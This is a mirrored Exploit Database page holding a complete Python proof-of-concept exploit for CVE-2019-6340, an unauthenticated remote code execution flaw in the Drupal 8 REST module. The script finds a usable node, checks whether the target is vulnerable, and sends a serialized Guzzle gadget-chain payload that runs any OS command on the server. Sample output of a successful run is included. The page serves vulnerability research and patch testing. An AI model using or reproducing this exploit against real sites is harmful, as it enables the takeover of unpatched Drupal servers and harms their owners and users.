Drupal < 8.6.9 - REST Module Remote Code Execution

• Exploit Database
• 119 阅读

• 作者： leonjza
  日期： 2019-02-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46459/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225

  #!/usr/bin/env python3   # CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC # 2019 @leonjza   # Technical details for this exploit is available at: # https://www.drupal.org/sa-core-2019-003 # https://www.ambionics.io/blog/drupal8-rce # https://twitter.com/jcran/status/1099206271901798400   # Sample usage: # # $ python cve-2019-6340.py http://127.0.0.1/ "ps auxf" # CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC #by @leonjza # # References: #https://www.drupal.org/sa-core-2019-003 #https://www.ambionics.io/blog/drupal8-rce # # [warning] Caching heavily affects reliability of this exploit. # Nodes are used as they are discovered, but once they are done, # you will have to wait for cache expiry. # # Targeting http://127.0.0.1/... # [+] Finding a usable node id... # [x] Node enum found a cached article at: 2, skipping # [x] Node enum found a cached article at: 3, skipping # [+] Using node_id 4 # [+] Target appears to be vulnerable! # # USER PID %CPU %MEMVSZ RSS TTYSTAT START TIME COMMAND # root490.00.0 4288 716 pts/0Ss+16:38 0:00 sh # root 10.01.4 390040 30540 ?Ss 15:20 0:00 apache2 -DFOREGROUND # www-data240.12.8 395652 57912 ?S15:20 0:08 apache2 -DFOREGROUND # www-data270.12.9 396152 61108 ?S15:20 0:08 apache2 -DFOREGROUND # www-data310.03.4 406304 70408 ?S15:22 0:04 apache2 -DFOREGROUND # www-data390.02.7 398472 56852 ?S16:14 0:02 apache2 -DFOREGROUND # www-data440.23.2 402208 66080 ?S16:37 0:05 apache2 -DFOREGROUND # www-data560.02.6 397988 55060 ?S16:38 0:01 apache2 -DFOREGROUND # www-data650.02.3 394252 48460 ?S16:40 0:01 apache2 -DFOREGROUND # www-data780.02.5 400996 51320 ?S16:47 0:01 apache2 -DFOREGROUND # www-data 1170.00.0 4288 712 ?S17:20 0:00\_ sh -c echo   import sys from urllib.parse import urlparse, urljoin   import requests     def build_url(*args) -> str: """ Builds a URL """   f = &apos;&apos; for x in args: f = urljoin(f, x)   return f     def uri_valid(x: str) -> bool: """ https://stackoverflow.com/a/38020041 """   result = urlparse(x) return all([result.scheme, result.netloc, result.path])     def check_drupal_cache(r: requests.Response) -> bool: """ Check if a response had the cache header. """   if &apos;X-Drupal-Cache&apos; in r.headers and r.headers[&apos;X-Drupal-Cache&apos;] == &apos;HIT&apos;: return True   return False     def find_article(base: str, f: int = 1, l: int = 100): """ Find a target article that does not 404 and is not cached """   while f < l: u = build_url(base, &apos;/node/&apos;, str(f)) r = requests.get(u)   if check_drupal_cache(r): print(f&apos;[x] Node enum found a cached article at: {f}, skipping&apos;) f += 1 continue   # found an article? if r.status_code == 200: return f f += 1     def check(base: str, node_id: int) -> bool: """ Check if the target is vulnerable. """   payload = { "_links": { "type": { "href": f"{urljoin(base, &apos;/rest/type/node/INVALID_VALUE&apos;)}" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "" } }   u = build_url(base, &apos;/node/&apos;, str(node_id)) r = requests.get(f&apos;{u}?_format=hal_json&apos;, json=payload, headers={"Content-Type": "application/hal+json"})   if check_drupal_cache(r): print(f&apos;Checking if node {node_id} is vuln returned cache HIT, ignoring&apos;) return False   if &apos;INVALID_VALUE does not correspond to an entity on this site&apos; in r.text: return True   return False     def exploit(base: str, node_id: int, cmd: str): """ Exploit using the Guzzle Gadgets """   # pad a easy search replace output: cmd = &apos;echo ---- & &apos; + cmd payload = { "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000" "GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"" "close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:" "{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";" "s:|size|:\"|command|\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000" "stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000" "GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"" "resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" "".replace(&apos;|size|&apos;, str(len(cmd))).replace(&apos;|command|&apos;, cmd) } ], "_links": { "type": { "href": f"{urljoin(base, &apos;/rest/type/shortcut/default&apos;)}" } } }   u = build_url(base, &apos;/node/&apos;, str(node_id)) r = requests.get(f&apos;{u}?_format=hal_json&apos;, json=payload, headers={"Content-Type": "application/hal+json"})   if check_drupal_cache(r): print(f&apos;Exploiting {node_id} returned cache HIT, may have failed&apos;)   if &apos;----&apos; not in r.text: print(&apos;[warn] Command execution _may_ have failed&apos;)   print(r.text.split(&apos;----&apos;)[1])     def main(base: str, cmd: str): """ Execute an OS command! """   print(&apos;[+] Finding a usable node id...&apos;) article = find_article(base) if not article: print(&apos;[!] Unable to find a node ID to reference. Check manually?&apos;) return   print(f&apos;[+] Using node_id {article}&apos;)   vuln = check(base, article) if not vuln: print(&apos;[!] Target does not appear to be vulnerable.&apos;) print(&apos;[!] It may also simply be a caching issue, so maybe just try again later.&apos;) return print(f&apos;[+] Target appears to be vulnerable!&apos;)   exploit(base, article, cmd)     if __name__ == &apos;__main__&apos;:   print(&apos;CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC&apos;) print(&apos; by @leonjza\n&apos;) print(&apos;References:\n&apos; &apos; https://www.drupal.org/sa-core-2019-003\n&apos; &apos; https://www.ambionics.io/blog/drupal8-rce\n&apos;) print(&apos;[warning] Caching heavily affects reliability of this exploit.\n&apos; &apos;Nodes are used as they are discovered, but once they are done,\n&apos; &apos;you will have to wait for cache expiry.\n&apos;)   if len(sys.argv) <= 2: print(f&apos;Usage: {sys.argv[0]} <target base URL> <command>&apos;) print(f&apos;Example: {sys.argv[0]} http://127.0.0.1/ id&apos;)   target = sys.argv[1] command = sys.argv[2] if not uri_valid(target): print(f&apos;Target {target} is not a valid URL&apos;) sys.exit(1)   print(f&apos;Targeting {target}...&apos;) main(target, command)